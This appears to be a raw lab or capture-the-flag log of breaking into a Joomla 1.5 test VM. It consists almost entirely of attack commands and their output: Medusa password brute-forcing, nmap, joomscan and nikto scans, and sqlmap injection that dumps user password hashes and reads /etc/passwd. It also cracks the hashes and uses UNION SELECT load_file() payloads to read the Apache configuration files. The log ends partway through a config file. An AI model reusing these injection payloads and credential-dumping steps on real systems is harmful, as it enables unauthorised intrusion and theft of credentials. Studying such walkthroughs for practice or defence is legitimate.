NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.

medusa -h 192.168.56.105 -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -M http -m DIR:/phpmyadmin/setup -v 6
...
ACCOUNT CHECK: [http] Host: 192.168.56.105 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: fletching (28231 of 88395 complete)
GENERAL: Unable to connect: unreachable destination
NOTICE: http.mod: failed to connect, port 80 was not open on 192.168.56.105
GENERAL: Medusa has finished.


medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/sqlmap/txt/wordlist.txt -v 6
...
medusa -h 192.168.56.105 -M web-form -m FORM:"check.php" -m DENY-SIGNAL:"Please try again" -m FORM-DATA:"post?username=&password=&Submit=Check%21" -u admin -P /usr/share/metasploit-framework/data/john/wordlists/password.lst -v 6
...
GENERAL: Medusa has finished.

NOTHING........

Going to back the 1st step....

root@kali:~# nmap 192.168.56.105

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:01 CET
Nmap scan report for 192.168.56.105
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.23 seconds

root@kali:~# nmap -sS  192.168.56.105 -pT1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00018s latency).
Not shown: 65533 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds
root@kali:~# nmap -sS  192.168.56.105 -p 1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:25 CET
Nmap scan report for 192.168.56.105
Host is up (0.00011s latency).
Not shown: 65533 closed ports
PORT    STATE    SERVICE
80/tcp  open     http
666/tcp filtered doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.81 seconds
root@kali:~# nmap -sS  192.168.56.105 -p 1-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:26 CET
Nmap scan report for 192.168.56.105
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT    STATE SERVICE
80/tcp  open  http
666/tcp open  doom
MAC Address: 00:0C:29:74:B5:21 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds
root@kali:~# nmap -sV  192.168.56.105 -pT:666

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-13 16:27 CET
Nmap scan report for 192.168.56.105
Host is up (0.00041s latency).
PORT    STATE SERVICE VERSION
666/tcp open  http    Apache httpd 2.2.14 ((Ubuntu))
MAC Address: 00:0C:29:74:B5:21 (VMware)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.38 seconds

http://192.168.56.105:666/

Powered by joomla 1.5 templates.

root@kali:~# joomscan -u http://192.168.56.105:666/


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|. 
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||     
 ''|...|'      |   |     .|.  .||. |'....|'  .||.    
   

=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4 
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Target: http://192.168.56.105:666

Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Generic version family ....... [1.5.x]

~1.5.x en-GB.ini revealed [1.5.12 - 1.5.14]

* Deduced version range is : [1.5.12 - 1.5.14]

## Fingerprinting done.


## 3 Components Found in front page  ##

 com_mailto     com_user   
 com_abc   




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? N/A

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. 
Vulnerable? No

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? No

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? No

# 6
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.11 <=
Check: /libraries/phpxmlrpc/xmlrpcs.php
Exploit: /libraries/phpxmlrpc/xmlrpcs.php
Vulnerable? No

# 7
Info -> Core: Missing JEXEC Check - Path Disclosure Vulnerability
Versions effected: 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 8
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? No

# 9
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? No

# 10
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? No

# 11
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? No

# 12
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? No

# 13
Info -> Core: joomla.php Remote File Inclusion Vulnerability
Versions effected: 1.0.0
Check: /includes/joomla.php
Exploit: /includes/joomla.php?includepath=
Vulnerable? No

# 14
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? Yes

# 15
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.12 <=
Check: /libraries/joomla/utilities/compat/php50x.php
Exploit: /libraries/joomla/utilities/compat/php50x.php
Vulnerable? No

# 16
Info -> CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /plugins/editors/xstandard/attachmentlibrary.php
Exploit: Submit new header X_CMS_LIBRARY_PATH with value ../ to  /plugins/editors/xstandard/attachmentlibrary.php
Vulnerable? No

# 17
Info -> CoreTemplate: ja_purity XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /templates/ja_purity/
Exploit: A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
Vulnerable? No

# 18
Info -> CoreLibrary: phpmailer Remote Code Execution Vulnerability
Versions effected: Joomla! 1.5.0 Beta/Stable
Check: /libraries/phpmailer/phpmailer.php
Exploit: N/A
Vulnerable? No

# 19
Info -> CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities
Versions effected: Joomla! 1.5.12
Check: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
Exploit: While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
Vulnerable? Yes

# 20
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability
Versions Affected: 1.5.5 <=
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password
Vulnerable? No

# 21
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 22
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 23
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 24
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 25
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? No

# 26
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? No

# 27
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? No

# 28
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
Vulnerable? No

# 29
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? No

# 30
Info -> CoreComponent: com_search Memory Comsumption DoS Vulnerability
Versions effected: Joomla! 1.5.0 Beta
Check: /components/com_search/
Exploit: N/A
Vulnerable? No

# 31
Info -> CoreComponent: com_poll (mosmsg) Memory Consumption DOS Vulnerability
Versions effected: 1.0.7 <=
Check: /components/com_poll/
Exploit: Send request  /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
Vulnerable? No

# 32
Info -> CoreComponent: com_banners Blind SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_banners/
Exploit: /index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
Vulnerable? No

# 33
Info -> CoreComponent: com_mailto timeout Vulnerability
Versions effected: 1.5.13 <=
Check: /components/com_mailto/
Exploit: [Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Vulnerable? Yes

# 34
Info -> Component: Amblog SQL Injection
Versions Affected: 1.0
Check: /index.php?option=com_amblog&view=amblog&catid=-1UNIONSELECT@@version
Exploit: /index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
Vulnerable? No

# 35
Info -> Component: Component com_newsfeeds SQL injection
Versions Affected: Any <=
Check: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Exploit: /index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
Vulnerable? No

# 36
Info -> Component: ABC Extension com_abc SQL
Versions Affected: 1.1.7 <=
Check: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Exploit: /index.php?option=com_abc&view=abc&letter=AS&sectionid='
Vulnerable? N/A

# 37
Info -> Component: Joomla Component com_searchlog SQL Injection
Versions Affected: 3.1.0 <=
Check: /administrator/index.php?option=com_searchlog&act=log
Exploit: /administrator/index.php?option=com_searchlog&act=log
Vulnerable? No

# 38
Info -> Component: Joomla Component com_djartgallery Multiple Vulnerabilities
Versions Affected: 0.9.1 <=
Check: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Exploit: /administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+
Vulnerable? N/A

There are 4 vulnerable points in 38 found entries!

~[*] Time Taken: 44 sec
~[*] Send bugs, suggestions, contributions to joomscan@yehg.net
root@kali:~#

http://192.168.56.105:666/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=
Restricted access

root@kali:~# nikto -host 192.168.56.105 -port 666
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        666
+ Start Time:         2013-11-13 16:58:24 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.14 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.7
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie 8eb16cd5703c7dc43799386d6dcb4057 created without the httponly flag
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 147545, size: 304, mtime: 0x41a7982c29d80
+ File/dir '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ File/dir '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ File/dir '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Cookie dc5b33c885319f0ed52b91c702cf76e9 created without the httponly flag
+ File/dir '/xmlrpc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 14 entries which should be manually viewed.
+ OSVDB-39272: favicon.ico file identifies this server as: Joomla
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1:666/images/".
+ Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ /configuration/: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 38 item(s) reported on remote host
+ End Time:           2013-11-13 16:58:56 (GMT1) (32 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


http://192.168.56.105:666/

sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3"
--dbs

available databases [4]:
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin

...

sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D joomla -T jos_users -C id,username,password --dump

+----+---------------+-------------------------------------------------------------------+
| id | username      | password                                                          |
+----+---------------+-------------------------------------------------------------------+
| 62 | Administrator | 08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl |
| 63 | JSmith        | 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF |
| 64 | BTallor       | abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy |
| 65 | test          | be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX |
+----+---------------+-------------------------------------------------------------------+


sqlmap -u "http://192.168.56.105:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --file-read "/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
avahi-autoipd:x:103:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:104:111:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
couchdb:x:105:113:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
speech-dispatcher:x:106:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
usbmux:x:107:46:usbmux daemon,,,:/home/usbmux:/bin/false
haldaemon:x:108:114:Hardware abstraction layer,,,:/var/run/hald:/bin/false
kernoops:x:109:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:110:115:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:111:117:RealtimeKit,,,:/proc:/bin/false
saned:x:112:118::/home/saned:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
gdm:x:114:120:Gnome Display Manager:/var/lib/gdm:/bin/false
p0wnbox:x:1000:1000:p0wnbox,,,:/home/p0wnbox:/bin/bash
mysql:x:115:123:MySQL Server,,,:/var/lib/mysql:/bin/false


download joomla_cracker.pl

a.pass:
Administrator:08f43b7f40fb0d56f6a8fb0271ec4710:n9RMVci9nqTUog3GjVTNP7IuOrPayqAl
JSmith:992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF
BTallor:abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy
test:be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX

root@kali:~# perl joomla-cracker.pl a.pass /usr/share/metasploit-framework/data/john/wordlists/password.lst
Found hash/plain/user = 992396d7fc19fd76393f359cb294e300:70NFLkBrApLamH9VNGjlViJLlJsB60KF / matrix / JSmith
Found hash/plain/user = be384a53bb01ae8acac1ea24dfdd065f:wpMwwAIdOLfdUbnSP9rhynCv0RLQvGQX / test / test
Found hash/plain/user = abe1ae513c16f2a021329cc109071705:FdOrWkL8oMGl1Tju0aT7ReFsOwIMKliy / victim / BTallor

login JSMith / matrix

index.php?option=com_user&view=reset&layout=confirm

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20@@version
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/passwd%27%29
http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/apache2.conf%27%29
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned. 
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at );
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#
#
LockFile /var/lock/apache2/accept.lock
#
#

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15

##
## Server-Pool Size Regulation (MPM specific)
##

# prefork MPM
# StartServers: number of server processes to start
# MinSpareServers: minimum number of server processes which are kept spare
# MaxSpareServers: maximum number of server processes which are kept spare
# MaxClients: maximum number of server processes allowed to start
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          5
    MinSpareServers       5
    MaxSpareServers      10
    MaxClients          150
    MaxRequestsPerChild   0

# worker MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          2
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxClients          150
    MaxRequestsPerChild   0

# event MPM
# StartServers: initial number of server processes to start
# MaxClients: maximum number of simultaneous client connections
# MinSpareThreads: minimum number of worker threads which are kept spare
# MaxSpareThreads: maximum number of worker threads which are kept spare
# ThreadsPerChild: constant number of worker threads in each server process
# MaxRequestsPerChild: maximum number of requests a server process serves

    StartServers          2
    MaxClients          150
    MinSpareThreads      25
    MaxSpareThreads      75
    ThreadLimit          64
    ThreadsPerChild      25
    MaxRequestsPerChild   0

# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}

#
# AccessFileName: The name of the file to look for in each directory
# for additional configuration directives.  See also the AllowOverride
# directive.
#

AccessFileName .htaccess

#
# The following lines prevent .htaccess and .htpasswd files from being
# viewed by Web clients.
#

    Order allow,deny
    Deny from all
    Satisfy all

#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain


#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog /var/log/apache2/error.log

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn

# Include module configuration:
Include /etc/apache2/mods-enabled/*.load
Include /etc/apache2/mods-enabled/*.conf

# Include all the user configurations:
Include /etc/apache2/httpd.conf

# Include ports listing
Include /etc/apache2/ports.conf

#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
# If you are behind a reverse proxy, you might want to change %h into %{X-Forwarded-For}i
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

#
# Define an access log for VirtualHosts that don't define their own logfile
CustomLog /var/log/apache2/other_vhosts_access.log vhost_combined


# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
Include /etc/apache2/conf.d/

# Include the virtual host configurations:
Include /etc/apache2/sites-enabled/


Where is the www-root ???

http://192.168.56.105:666/index.php?option=com_amblog&view=amblog&catid=-1%20UNION%20SELECT%20load_file%28%27/etc/apache2/sites-available/default%27%29


ServerAdmin webmaster@localhost

    DocumentRoot /var/www/welcome
   
        Options FollowSymLinks
        AllowOverride None
   
    /var/www/
>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order allow,deny
        allow from all
   

    ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
   
        AllowOverride None
        Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
        Order allow,deny
        Allow from all
   

    ErrorLog /var/log/apache2/error.log

    # Possible values include: debug, info, notice, warn, error, crit,
    # alert, emerg.
    LogLevel warn

    CustomLog /var/log/apache2/access.log combined

    Alias /doc/ "/usr/share/doc/"
   
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
   



*:666>
    ServerAdmin webmaster@localhost

    DocumentRoot /var/www
   
        Options FollowSymLinks
        AllowOverride None
   
   
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
